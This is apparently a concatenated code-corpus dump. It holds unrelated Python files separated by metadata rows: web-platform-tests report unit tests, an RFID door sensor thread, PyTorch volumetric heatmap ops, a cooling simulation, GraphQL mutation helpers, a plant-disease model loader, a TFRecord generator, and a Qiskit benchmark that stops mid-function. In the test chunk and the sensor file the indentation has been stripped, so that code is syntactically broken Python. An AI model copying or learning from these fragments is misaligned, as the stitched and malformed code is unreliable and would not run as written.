self.assertEqual(r.product_id(), 'firefox-59.0-linux-afa59408e1')
r._report['run_info']['os_version'] = '4.4'
self.assertEqual(r.product_id(separator='_'),
'firefox_59.0_linux_4.4_afa59408e1')
def test_product_id_sanitize(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'chrome!',
'browser_version': '1.2.3 dev-1',
'os': 'linux',
}
}
r.hashsum = lambda: 'afa59408e1797c7091d7e89de5561612f7da440d'
self.assertEqual(r.product_id(separator='-', sanitize=True),
'chrome_-1.2.3_dev-1-linux-afa59408e1')
def test_sha_product_path(self):
r = WPTReport()
r._report = {
'run_info': {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux'
}
}
r.hashsum = lambda: 'afa59408e1797c7091d7e89de5561612f7da440d'
self.assertEqual(r.sha_product_path,
'0bdaaf9c1622ca49eb140381af1ece6d8001c934/'
'firefox-59.0-linux-afa59408e1')
def test_sha_summary_path(self):
r = WPTReport()
r._report = {
'run_info': {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux'
}
}
r.hashsum = lambda: 'afa59408e1797c7091d7e89de5561612f7da440d'
self.assertEqual(r.sha_summary_path,
'0bdaaf9c1622ca49eb140381af1ece6d8001c934/'
'firefox-59.0-linux-afa59408e1-summary.json.gz')
def test_normalize_version(self):
r = WPTReport()
r._report = {'run_info': {
'browser_version': 'Technology Preview (Release 67, 13607.1.9.0.1)'
}}
r.normalize_version()
self.assertEqual(r.run_info['browser_version'], '67 preview')
def test_normalize_version_missing_version(self):
r = WPTReport()
r._report = {'run_info': {}}
r.normalize_version()
# Do not throw!
self.assertIsNone(r.run_info.get('browser_version'))
class HelpersTest(unittest.TestCase):
def test_prepare_labels_from_empty_str(self):
r = WPTReport()
r.update_metadata(browser_name='firefox')
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'firefox', 'stable'}
)
def test_prepare_labels_from_custom_labels(self):
r = WPTReport()
r.update_metadata(browser_name='firefox')
self.assertSetEqual(
prepare_labels(r, 'foo,bar', 'blade-runner'),
{'bar', 'blade-runner', 'firefox', 'foo', 'stable'}
)
def test_prepare_labels_from_experimental_label(self):
r = WPTReport()
r.update_metadata(browser_name='firefox')
self.assertSetEqual(
prepare_labels(r, 'experimental', 'blade-runner'),
{'blade-runner', 'experimental', 'firefox'}
)
def test_prepare_labels_from_stable_label(self):
r = WPTReport()
r.update_metadata(browser_name='firefox')
self.assertSetEqual(
prepare_labels(r, 'stable', 'blade-runner'),
{'blade-runner', 'firefox', 'stable'}
)
def test_prepare_labels_from_browser_channel(self):
# Chrome Dev
r = WPTReport()
r._report = {
'run_info': {
'product': 'chrome',
'browser_channel': 'dev',
}
}
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'dev', 'experimental', 'chrome'}
)
# Chrome Canary
r._report['run_info']['browser_channel'] = 'canary'
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'canary', 'nightly', 'chrome'}
)
# Chrome Nightly
r._report['run_info']['browser_channel'] = 'nightly'
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'nightly', 'chrome'}
)
# WebKitGTK Nightly
r._report['run_info']['product'] = 'webkitgtk_minibrowser'
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'nightly', 'experimental',
'webkitgtk_minibrowser'}
)
# Firefox Nightly
r._report['run_info']['product'] = 'firefox'
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'nightly', 'experimental', 'firefox'}
)
# Firefox Beta
r._report['run_info']['browser_channel'] = 'beta'
self.assertSetEqual(
prepare_labels(r, '', 'blade-runner'),
{'blade-runner', 'beta', 'firefox'}
)
def test_normalize_product_edge_webdriver(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'edge_webdriver',
}
}
self.assertSetEqual(
normalize_product(r),
{'edge', 'webdriver', 'edge_webdriver'}
)
self.assertEqual(
r.run_info['product'],
'edge'
)
def test_normalize_product_edgechromium(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'edgechromium',
}
}
self.assertSetEqual(
normalize_product(r),
{'edge', 'edgechromium'}
)
self.assertEqual(
r.run_info['product'],
'edge'
)
def test_normalize_product_webkitgtk_minibrowser(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'webkitgtk_minibrowser',
}
}
self.assertSetEqual(
normalize_product(r),
{'webkitgtk', 'minibrowser'}
)
self.assertEqual(
r.run_info['product'],
'webkitgtk'
)
def test_normalize_product_noop(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'firefox',
}
}
self.assertSetEqual(
normalize_product(r),
set()
)
self.assertEqual(
r.run_info['product'],
'firefox'
)
| 33.862267
| 79
| 0.489323
|
1d569132663cf934d615fddae541ac7e28825d17
| 1,803
|
py
|
Python
|
door_interface/helpers/sensor.py
|
itsjesseyo/enjigo_door
|
fd29fd9bd28c1d7915e4f9ad5e29635f5cbc4601
|
[
"Unlicense"
] | 1
|
2015-03-08T23:21:58.000Z
|
2015-03-08T23:21:58.000Z
|
door_interface/helpers/sensor.py
|
luxnovalabs/enjigo_door
|
fd29fd9bd28c1d7915e4f9ad5e29635f5cbc4601
|
[
"Unlicense"
] | null | null | null |
door_interface/helpers/sensor.py
|
luxnovalabs/enjigo_door
|
fd29fd9bd28c1d7915e4f9ad5e29635f5cbc4601
|
[
"Unlicense"
] | 1
|
2018-09-29T23:38:28.000Z
|
2018-09-29T23:38:28.000Z
|
import sys, serial, time, signal, threading
from MFRC522 import MFRC522
from event import Event
class Sensor(threading.Thread):
# main program for reading and processing tags
def __init__(self, name):
threading.Thread.__init__(self)
self.name = name
self.continue_reading = False
self.tag_reader = MFRC522()
self.signal = signal.signal(signal.SIGINT, self.end_read)
self.last_tag = ''
#EVENTS
self.FOUND_TAG = Event()
def end_read(self, signal,frame):
print "Ctrl+C captured, ending read."
self.stop()
def stop(self):
self.continue_reading = False
def run(self):
print "sensor running"
self.continue_reading = True
#if RFID is working - start monitoring it
while self.continue_reading:
(status,TagType) = self.tag_reader.MFRC522_Request(self.tag_reader.PICC_REQIDL)
if status == self.tag_reader.MI_OK:
print "Card detected"
(status,backData) = self.tag_reader.MFRC522_Anticoll()
if status == self.tag_reader.MI_OK:
rfid_tag = "".join(str(val) for val in backData)
print 'TAG : %s' % rfid_tag
self.last_tag = rfid_tag
self.FOUND_TAG(self)
time.sleep(.1)
print 'not reading sensor'
# def start(self):
# print "sensor running"
# self.continue_reading = True
# #if RFID is working - start monitoring it
# while self.continue_reading:
# (status,TagType) = self.tag_reader.MFRC522_Request(self.tag_reader.PICC_REQIDL)
# if status == self.tag_reader.MI_OK:
# print "Card detected"
# (status,backData) = self.tag_reader.MFRC522_Anticoll()
# if status == self.tag_reader.MI_OK:
# rfid_tag = "".join(str(val) for val in backData)
# print 'TAG : %s' % rfid_tag
# self.last_tag = rfid_tag
# self.FOUND_TAG(self)
# time.sleep(.1)
# print 'not reading sensor'
| 27.318182
| 84
| 0.69218
|
f703224172490713b6ea5921d8e35e234816b5d6
| 8,418
|
py
|
Python
|
mvn/utils/op.py
|
K4S4B4/learnable-triangulation-pytorch
|
94f5121919785bf7c89dd973521a21c01104dbd5
|
[
"MIT"
] | null | null | null |
mvn/utils/op.py
|
K4S4B4/learnable-triangulation-pytorch
|
94f5121919785bf7c89dd973521a21c01104dbd5
|
[
"MIT"
] | null | null | null |
mvn/utils/op.py
|
K4S4B4/learnable-triangulation-pytorch
|
94f5121919785bf7c89dd973521a21c01104dbd5
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from mvn.utils.img import to_numpy, to_torch
from mvn.utils import multiview
def integrate_tensor_2d(heatmaps, softmax=True):
"""Applies softmax to heatmaps and integrates them to get their's "center of masses"
Args:
heatmaps torch tensor of shape (batch_size, n_heatmaps, h, w): input heatmaps
Returns:
coordinates torch tensor of shape (batch_size, n_heatmaps, 2): coordinates of center of masses of all heatmaps
"""
batch_size, n_heatmaps, h, w = heatmaps.shape
heatmaps = heatmaps.reshape((batch_size, n_heatmaps, -1))
if softmax:
heatmaps = nn.functional.softmax(heatmaps, dim=2)
else:
heatmaps = nn.functional.relu(heatmaps)
heatmaps = heatmaps.reshape((batch_size, n_heatmaps, h, w))
mass_x = heatmaps.sum(dim=2)
mass_y = heatmaps.sum(dim=3)
mass_times_coord_x = mass_x * torch.arange(w).type(torch.float).to(mass_x.device)
mass_times_coord_y = mass_y * torch.arange(h).type(torch.float).to(mass_y.device)
x = mass_times_coord_x.sum(dim=2, keepdim=True)
y = mass_times_coord_y.sum(dim=2, keepdim=True)
if not softmax:
x = x / mass_x.sum(dim=2, keepdim=True)
y = y / mass_y.sum(dim=2, keepdim=True)
coordinates = torch.cat((x, y), dim=2)
coordinates = coordinates.reshape((batch_size, n_heatmaps, 2))
return coordinates
def integrate_tensor_3d(volumes, softmax=True):
batch_size, n_volumes, x_size, y_size, z_size = volumes.shape
volumes = volumes.reshape((batch_size, n_volumes, -1))
if softmax:
volumes = nn.functional.softmax(volumes, dim=2)
else:
volumes = nn.functional.relu(volumes)
volumes = volumes.reshape((batch_size, n_volumes, x_size, y_size, z_size))
mass_x = volumes.sum(dim=3).sum(dim=3)
mass_y = volumes.sum(dim=2).sum(dim=3)
mass_z = volumes.sum(dim=2).sum(dim=2)
mass_times_coord_x = mass_x * torch.arange(x_size).type(torch.float).to(mass_x.device)
mass_times_coord_y = mass_y * torch.arange(y_size).type(torch.float).to(mass_y.device)
mass_times_coord_z = mass_z * torch.arange(z_size).type(torch.float).to(mass_z.device)
x = mass_times_coord_x.sum(dim=2, keepdim=True)
y = mass_times_coord_y.sum(dim=2, keepdim=True)
z = mass_times_coord_z.sum(dim=2, keepdim=True)
if not softmax:
x = x / mass_x.sum(dim=2, keepdim=True)
y = y / mass_y.sum(dim=2, keepdim=True)
z = z / mass_z.sum(dim=2, keepdim=True)
coordinates = torch.cat((x, y, z), dim=2)
coordinates = coordinates.reshape((batch_size, n_volumes, 3))
return coordinates, volumes
def integrate_tensor_3d_with_coordinates(volumes, coord_volumes, softmax=True):
batch_size, n_volumes, x_size, y_size, z_size = volumes.shape
volumes = volumes.reshape((batch_size, n_volumes, -1))
if softmax:
volumes = nn.functional.softmax(volumes, dim=2)
else:
volumes = nn.functional.relu(volumes)
volumes = volumes.reshape((batch_size, n_volumes, x_size, y_size, z_size))
coordinates = torch.einsum("bnxyz, bxyzc -> bnc", volumes, coord_volumes)
return coordinates #, volumes
def unproject_heatmaps(heatmaps, proj_matricies, coord_volumes, volume_aggregation_method='sum', vol_confidences=None):
device = heatmaps.device
batch_size, n_views, n_joints, heatmap_shape = heatmaps.shape[0], heatmaps.shape[1], heatmaps.shape[2], tuple(heatmaps.shape[3:]) # 1,4,32,96x96
volume_shape = coord_volumes.shape[1:4] #64x64x64
volume_batch = torch.zeros(batch_size, n_joints, *volume_shape, device=device) # 1x32x64x64x64のTensor
# TODO: speed up this this loop
for batch_i in range(batch_size):
coord_volume = coord_volumes[batch_i] # Bx64x64x64x3 -> 64x64x64x3
grid_coord = coord_volume.reshape((-1, 3)) # 262144x3
volume_batch_to_aggregate = torch.zeros(n_views, n_joints, *volume_shape, device=device) # 4x32x64x64x64
for view_i in range(n_views):
heatmap = heatmaps[batch_i, view_i] # 1x4x32x96x96 -> 32x96x96
heatmap = heatmap.unsqueeze(0) # 1x32x96x96 (一番初めに次元を追加)
grid_coord_proj = multiview.project_3d_points_to_image_plane_without_distortion( # 262144x3
proj_matricies[batch_i, view_i], grid_coord, convert_back_to_euclidean=False
)
invalid_mask = grid_coord_proj[:, 2] <= 0.0 # depth must be larger than 0.0 #人がカメラに近づきすぎた場合に起こる??
grid_coord_proj[grid_coord_proj[:, 2] == 0.0, 2] = 1.0 # not to divide by zero
grid_coord_proj = multiview.homogeneous_to_euclidean(grid_coord_proj)
# transform to [-1.0, 1.0] range
grid_coord_proj_transformed = torch.zeros_like(grid_coord_proj) # 262144x2
grid_coord_proj_transformed[:, 0] = 2 * (grid_coord_proj[:, 0] / heatmap_shape[0] - 0.5) # (0,0)->(96,96)の座標を、中心を(0,0)、左上を(-1,-1)、右下を(1,1)とする相対的な座標に変換
grid_coord_proj_transformed[:, 1] = 2 * (grid_coord_proj[:, 1] / heatmap_shape[1] - 0.5)
grid_coord_proj = grid_coord_proj_transformed
# prepare to F.grid_sample
grid_coord_proj = grid_coord_proj.unsqueeze(1).unsqueeze(0) # 引数で指定された場所に一つ次元を足すらしい 1x262144x1x2。heatmapが1x32x96x96
try:
current_volume = F.grid_sample(heatmap, grid_coord_proj, align_corners=True) # 1x32x262144x1 = Heatmap(1x32x96x96), grid_coord_proj(1x262144x1x2)
except TypeError: # old PyTorch
current_volume = F.grid_sample(heatmap, grid_coord_proj)
# zero out non-valid points
current_volume = current_volume.view(n_joints, -1) #32x262144
current_volume[:, invalid_mask] = 0.0
# reshape back to volume
current_volume = current_volume.view(n_joints, *volume_shape) #32x64x64x64
# collect
volume_batch_to_aggregate[view_i] = current_volume
# agregate resulting volume
if volume_aggregation_method.startswith('conf'):
volume_batch[batch_i] = (volume_batch_to_aggregate * vol_confidences[batch_i].view(n_views, n_joints, 1, 1, 1)).sum(0)
elif volume_aggregation_method == 'sum':
volume_batch[batch_i] = volume_batch_to_aggregate.sum(0)
elif volume_aggregation_method == 'max':
volume_batch[batch_i] = volume_batch_to_aggregate.max(0)[0]
elif volume_aggregation_method == 'softmax':
volume_batch_to_aggregate_softmin = volume_batch_to_aggregate.clone() # 2x32x64x64x64(n_views, n_joints, *volume_shape)
volume_batch_to_aggregate_softmin = volume_batch_to_aggregate_softmin.view(n_views, -1) # reshape
volume_batch_to_aggregate_softmin = nn.functional.softmax(volume_batch_to_aggregate_softmin, dim=0)
volume_batch_to_aggregate_softmin = volume_batch_to_aggregate_softmin.view(n_views, n_joints, *volume_shape) #reshape back
volume_batch[batch_i] = (volume_batch_to_aggregate * volume_batch_to_aggregate_softmin).sum(0)
else:
raise ValueError("Unknown volume_aggregation_method: {}".format(volume_aggregation_method))
return volume_batch
def gaussian_2d_pdf(coords, means, sigmas, normalize=True):
normalization = 1.0
if normalize:
normalization = (2 * np.pi * sigmas[:, 0] * sigmas[:, 0])
exp = torch.exp(-((coords[:, 0] - means[:, 0]) ** 2 / sigmas[:, 0] ** 2 + (coords[:, 1] - means[:, 1]) ** 2 / sigmas[:, 1] ** 2) / 2)
return exp / normalization
def render_points_as_2d_gaussians(points, sigmas, image_shape, normalize=True):
device = points.device
n_points = points.shape[0]
yy, xx = torch.meshgrid(torch.arange(image_shape[0]).to(device), torch.arange(image_shape[1]).to(device))
grid = torch.stack([xx, yy], dim=-1).type(torch.float32)
grid = grid.unsqueeze(0).repeat(n_points, 1, 1, 1) # (n_points, h, w, 2)
grid = grid.reshape((-1, 2))
points = points.unsqueeze(1).unsqueeze(1).repeat(1, image_shape[0], image_shape[1], 1)
points = points.reshape(-1, 2)
sigmas = sigmas.unsqueeze(1).unsqueeze(1).repeat(1, image_shape[0], image_shape[1], 1)
sigmas = sigmas.reshape(-1, 2)
images = gaussian_2d_pdf(grid, points, sigmas, normalize=normalize)
images = images.reshape(n_points, *image_shape)
return images
| 42.730964
| 162
| 0.68698
|
af3172a258cfae833fce2b37178759d67dc14d66
| 899
|
py
|
Python
|
Assignments/cooling.py
|
jonestcharles/physics-simulation
|
cfdb27f1f560b01f901e7b1796d2a695ffce6493
|
[
"MIT"
] | null | null | null |
Assignments/cooling.py
|
jonestcharles/physics-simulation
|
cfdb27f1f560b01f901e7b1796d2a695ffce6493
|
[
"MIT"
] | null | null | null |
Assignments/cooling.py
|
jonestcharles/physics-simulation
|
cfdb27f1f560b01f901e7b1796d2a695ffce6493
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 09 12:12:57 2016
@author: jone0208
"""
import matplotlib.pyplot as plt
import Body
import Solver
import Simulation
def main():
coffee = Body.ThermalBody(500)
solver = Solver.Euler(0.5)
def stop_condition(coffee):
return coffee.temperature > sim.Ta*1.1
sim = Simulation.CoolingSim(stop_condition,solver,293,0.05,coffee)
t,T = sim.get_results()
plt.plot(t,T)
coffee = Body.ThermalBody(500)
solver = Solver.RK2(0.5)
def stop_condition(coffee):
return coffee.temperature > sim.Ta*1.1
sim = Simulation.CoolingSim(stop_condition,solver,293,0.05,coffee)
t,T = sim.get_results()
plt.plot(t,T)
plt.title("OOP Cooling Curves")
plt.xlabel("Time [s]")
plt.ylabel("Temperature[K]")
plt.legend(["Euler Curve","RK2 Cooling Curve"])
if __name__ == "__main__": main()
| 25.685714
| 70
| 0.65406
|
7a784d459d56b919655db95363986b4e446c6ce0
| 3,242
|
py
|
Python
|
trompace/mutations/application.py
|
trompamusic/ce-queries-template
|
cc5ae69d0e76623bfd72e9453f569f6624bf7c3b
|
[
"Apache-2.0"
] | 1
|
2020-06-18T15:43:18.000Z
|
2020-06-18T15:43:18.000Z
|
trompace/mutations/application.py
|
trompamusic/ce-queries-template
|
cc5ae69d0e76623bfd72e9453f569f6624bf7c3b
|
[
"Apache-2.0"
] | 60
|
2019-12-17T11:08:28.000Z
|
2021-03-02T16:19:41.000Z
|
trompace/mutations/application.py
|
trompamusic/trompace-client
|
cc5ae69d0e76623bfd72e9453f569f6624bf7c3b
|
[
"Apache-2.0"
] | null | null | null |
# Generate GraphQL queries for mutations pertaining to software applications.
from trompace.exceptions import UnsupportedLanguageException, NotAMimeTypeException
from trompace import StringConstant, filter_none_args
from .templates import mutation_create, mutation_link
from ..constants import SUPPORTED_LANGUAGES
CREATE_APPLICATION = '''CreateSoftwareApplication(
{parameters}
) {{
identifier
}}'''
ADD_ENTRYPOINT_APPLICATION = '''AddEntryPointActionApplication(
from: {{identifier: "{identifier_1}"}}
to: {{identifier: "{identifier_2}"}}
){{
from {{
identifier
}}
to {{
identifier
}}
}}'''
def mutation_create_application(*, name: str, contributor: str, creator: str, source: str, title: str = None,
subject: str = None, language: str = None, description: str = None, format_: str = None,
softwareversion: str = None):
"""Returns a mutation for creating a software application object
Arguments:
name: The name of the software application.
title: the html title of the page at `source`
contributor: A person, an organization, or a service responsible for adding the software application. This can be either a name or a base URL.
creator: The person, organization or service responsible for adding the software application.
source: The URL of the web resource to be represented by the node.
subject: The subject associated with the application.
description: An account of the software application.
language: The language of the page at `source`. Currently supported languages are en,es,ca,nl,de,fr
softwareversion: the version of the software
Returns:
The string for the mutation for creating the artist.
Raises:
UnsupportedLanguageException if the input language is not one of the supported languages.
NotAMimeTypeException if format_ is not a valid mimetype.
"""
if language and language not in SUPPORTED_LANGUAGES:
raise UnsupportedLanguageException(language)
if format_ and "/" not in format_:
raise NotAMimeTypeException(format_)
args = {
"name": name,
"contributor": contributor,
"creator": creator,
"source": source,
"title": title,
"subject": subject,
"description": description,
"format": format_,
"softwareVersion": softwareversion
}
if language:
args["language"] = StringConstant(language.lower())
args = filter_none_args(args)
return mutation_create(args, CREATE_APPLICATION)
def mutation_add_entrypoint_application(application_id: str, entrypoint_id: str):
"""Returns a mutation for adding an entry point to an application..
Arguments:
application_id: The unique identifier of the application object.
entrypoint_id: The unique identifier of the entrypoint.
Returns:
The string for the mutation for creating a relation between an application and an entry point.
"""
return mutation_link(entrypoint_id, application_id, ADD_ENTRYPOINT_APPLICATION)
| 40.525
| 150
| 0.677977
|
c67a668aad9331ac2867adbe0b0c335204f997cb
| 4,717
|
py
|
Python
|
public/model_loader.py
|
DaibinRaju/Omnis-Agro
|
3b25f736eef151fe62dabc66eaa19a05c4f82140
|
[
"MIT"
] | null | null | null |
public/model_loader.py
|
DaibinRaju/Omnis-Agro
|
3b25f736eef151fe62dabc66eaa19a05c4f82140
|
[
"MIT"
] | 1
|
2022-02-27T05:11:32.000Z
|
2022-02-27T05:11:32.000Z
|
public/model_loader.py
|
DaibinRaju/Omnis-Agro
|
3b25f736eef151fe62dabc66eaa19a05c4f82140
|
[
"MIT"
] | null | null | null |
import torch
from torch import nn
from torchvision import models
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
import sys
def load_checkpoint(filepath):
'''
input: filepath of the saved model
return: a model loaded from the path
checks if the model saved is a densenet 121 model and defining our own classifier
'''
checkpoint = torch.load(filepath)
if checkpoint['arch'] == 'densenet121':
model = models.densenet121(pretrained=True)
for param in model.parameters():
param.requires_grad = False
else:
print("Architecture not recognized.")
model.class_to_idx = checkpoint['class_to_idx']
model.classifier = nn.Sequential(nn.Linear(1024, 512),
nn.ReLU(),
nn.Linear(512, 9),
nn.LogSoftmax(dim=1))
model.load_state_dict(checkpoint['model_state_dict'])
return model
model = load_checkpoint('checkpoint.pth')
#loading the model from the memory
def process_image(image_path):
''' input: path of the image to be processed
Scales, crops, and normalizes a PIL image for a PyTorch model,
returns an Numpy array
'''
# Process a PIL image for use in a PyTorch model
pil_image = Image.open(image_path)
# Resize
if pil_image.size[0] > pil_image.size[1]:
pil_image.thumbnail((5000, 256))
else:
pil_image.thumbnail((256, 5000))
# Crop
left_margin = (pil_image.width-224)/2
bottom_margin = (pil_image.height-224)/2
right_margin = left_margin + 224
top_margin = bottom_margin + 224
pil_image = pil_image.crop((left_margin, bottom_margin, right_margin, top_margin))
# Normalize
np_image = np.array(pil_image)/255
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
np_image = (np_image - mean) / std
# PyTorch expects the color channel to be the first dimension but it's the third dimension in the PIL image and Numpy array
# Color channel needs to be first; retain the order of the other two dimensions.
np_image = np_image.transpose((2, 0, 1))
return np_image
def imshow(image, ax=None, title=None):
'''
input: a numpy array of the image created by the process_image fn
'''
if ax is None:
fig, ax = plt.subplots()
# PyTorch tensors assume the color channel is the first dimension
# but matplotlib assumes is the third dimension
image = image.transpose((1, 2, 0))
# Undo preprocessing (remove the normalization)
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
image = std * image + mean
if title is not None:
ax.set_title(title)
# Image needs to be clipped between 0 and 1 or it looks like noise when displayed
image = np.clip(image, 0, 1)
ax.imshow(image)
return ax
def predict(image_path, model, print_image=0, topk=5):
'''
input: image path of image, model to be used, boolean print_image to print the image
and no of top probabilities
Predict the class (or classes) of an image using a trained deep learning model.
prints top probabilities and indices
'''
model.eval()
if(torch.cuda.is_available()):
model.to('cuda')
image = process_image(image_path)
if(print_image):
imshow(image)
# Convert image to PyTorch tensor first
if(torch.cuda.is_available()):
image = torch.from_numpy(image).type(torch.cuda.FloatTensor)
else:
image = torch.from_numpy(image).type(torch.FloatTensor)
# Returns a new tensor with a dimension of size one inserted at the specified position.
image = image.unsqueeze(0)
with torch.no_grad():
output = model.forward(image)
probabilities = torch.exp(output)
# Probabilities and the indices of those probabilities corresponding to the classes
top_probabilities, top_indices = probabilities.topk(topk)
#print(top_probabilities)
#print(top_indices)
# Convert to lists
top_probabilities = top_probabilities.detach().type(torch.FloatTensor).numpy().tolist()[0]
top_indices = top_indices.detach().type(torch.FloatTensor).numpy().tolist()[0]
for i in top_indices:
print(i,end=" ")
for i in top_probabilities:
print('{:.4f}'.format(i*100),end=" ")
#print(top_probabilities)
#print(top_indices)
imageFile=sys.argv[1]
#predict('9.jpg', model)
predict(imageFile, model)
| 29.85443
| 127
| 0.637693
|
6053cc416f53a962bbcba85e2a8a0d52722a0e9a
| 4,859
|
py
|
Python
|
generate_tfrecord.py
|
AlfredPro/object_detection_demo
|
949d5dc42f0ae3669ad35c1c1fcb634e4d234c4a
|
[
"MIT"
] | null | null | null |
generate_tfrecord.py
|
AlfredPro/object_detection_demo
|
949d5dc42f0ae3669ad35c1c1fcb634e4d234c4a
|
[
"MIT"
] | null | null | null |
generate_tfrecord.py
|
AlfredPro/object_detection_demo
|
949d5dc42f0ae3669ad35c1c1fcb634e4d234c4a
|
[
"MIT"
] | null | null | null |
"""
Usage:
# Create train data:
python generate_tfrecord.py --label=<LABEL> --csv_input=<PATH_TO_ANNOTATIONS_FOLDER>/train_labels.csv --output_path=<PATH_TO_ANNOTATIONS_FOLDER>/train.record <PATH_TO_ANNOTATIONS_FOLDER>/label_map.pbtxt
# Create test data:
python generate_tfrecord.py --label=<LABEL> --csv_input=<PATH_TO_ANNOTATIONS_FOLDER>/test_labels.csv --output_path=<PATH_TO_ANNOTATIONS_FOLDER>/test.record --label_map <PATH_TO_ANNOTATIONS_FOLDER>/label_map.pbtxt
"""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import os
import io
import pandas as pd
#import tensorflow.compat.v1 as tf
import tensorflow as tf
import sys
sys.path.append("../../models/research")
from PIL import Image
from object_detection.utils import dataset_util
from collections import namedtuple, OrderedDict
flags = tf.app.flags
flags.DEFINE_string("csv_input", "", "Path to the CSV input")
flags.DEFINE_string("output_path", "", "Path to output TFRecord")
flags.DEFINE_string(
"label_map",
"",
"Path to the `label_map.pbtxt` contains the <class_name>:<class_index> pairs generated by `xml_to_csv.py` or manually.",
)
# if your image has more labels input them as
# flags.DEFINE_string('label0', '', 'Name of class[0] label')
# flags.DEFINE_string('label1', '', 'Name of class[1] label')
# and so on.
flags.DEFINE_string("img_path", "", "Path to images")
FLAGS = flags.FLAGS
def split(df, group):
data = namedtuple("data", ["filename", "object"])
gb = df.groupby(group)
return [
data(filename, gb.get_group(x))
for filename, x in zip(gb.groups.keys(), gb.groups)
]
def create_tf_example(group, path, label_map):
with tf.gfile.GFile(os.path.join(path, "{}".format(group.filename)), "rb") as fid:
encoded_jpg = fid.read()
encoded_jpg_io = io.BytesIO(encoded_jpg)
image = Image.open(encoded_jpg_io)
width, height = image.size
filename = group.filename.encode("utf8")
image_format = b"jpg"
# check if the image format is matching with your images.
xmins = []
xmaxs = []
ymins = []
ymaxs = []
classes_text = []
classes = []
for index, row in group.object.iterrows():
xmins.append(row["xmin"] / width)
xmaxs.append(row["xmax"] / width)
ymins.append(row["ymin"] / height)
ymaxs.append(row["ymax"] / height)
classes_text.append(str(row["class"]).encode("utf8"))
class_index = label_map.get(str(row["class"]))
assert (
class_index is not None
), "class label: `{}` not found in label_map: {}".format(
row["class"], label_map
)
classes.append(class_index)
tf_example = tf.train.Example(
features=tf.train.Features(
feature={
"image/height": dataset_util.int64_feature(height),
"image/width": dataset_util.int64_feature(width),
"image/filename": dataset_util.bytes_feature(filename),
"image/source_id": dataset_util.bytes_feature(filename),
"image/encoded": dataset_util.bytes_feature(encoded_jpg),
"image/format": dataset_util.bytes_feature(image_format),
"image/object/bbox/xmin": dataset_util.float_list_feature(xmins),
"image/object/bbox/xmax": dataset_util.float_list_feature(xmaxs),
"image/object/bbox/ymin": dataset_util.float_list_feature(ymins),
"image/object/bbox/ymax": dataset_util.float_list_feature(ymaxs),
"image/object/class/text": dataset_util.bytes_list_feature(
classes_text
),
"image/object/class/label": dataset_util.int64_list_feature(classes),
}
)
)
return tf_example
def main(_):
writer = tf.python_io.TFRecordWriter(FLAGS.output_path)
path = os.path.join(os.getcwd(), FLAGS.img_path)
examples = pd.read_csv(FLAGS.csv_input)
# Load the `label_map` from pbtxt file.
from object_detection.utils import label_map_util
label_map = label_map_util.load_labelmap(FLAGS.label_map)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=90, use_display_name=True
)
category_index = label_map_util.create_category_index(categories)
label_map = {}
for k, v in category_index.items():
label_map[v.get("name")] = v.get("id")
grouped = split(examples, "filename")
for group in grouped:
tf_example = create_tf_example(group, path, label_map)
writer.write(tf_example.SerializeToString())
writer.close()
output_path = os.path.join(os.getcwd(), FLAGS.output_path)
print("Successfully created the TFRecords: {}".format(output_path))
if __name__ == "__main__":
tf.app.run()
| 35.727941
| 214
| 0.672566
|
1d80587b643f972695a8e758a576cc05416874df
| 5,469
|
py
|
Python
|
data/p3BR/R1/benchmark/startQiskit_QC402.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p3BR/R1/benchmark/startQiskit_QC402.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p3BR/R1/benchmark/startQiskit_QC402.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=3
# total number=72
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
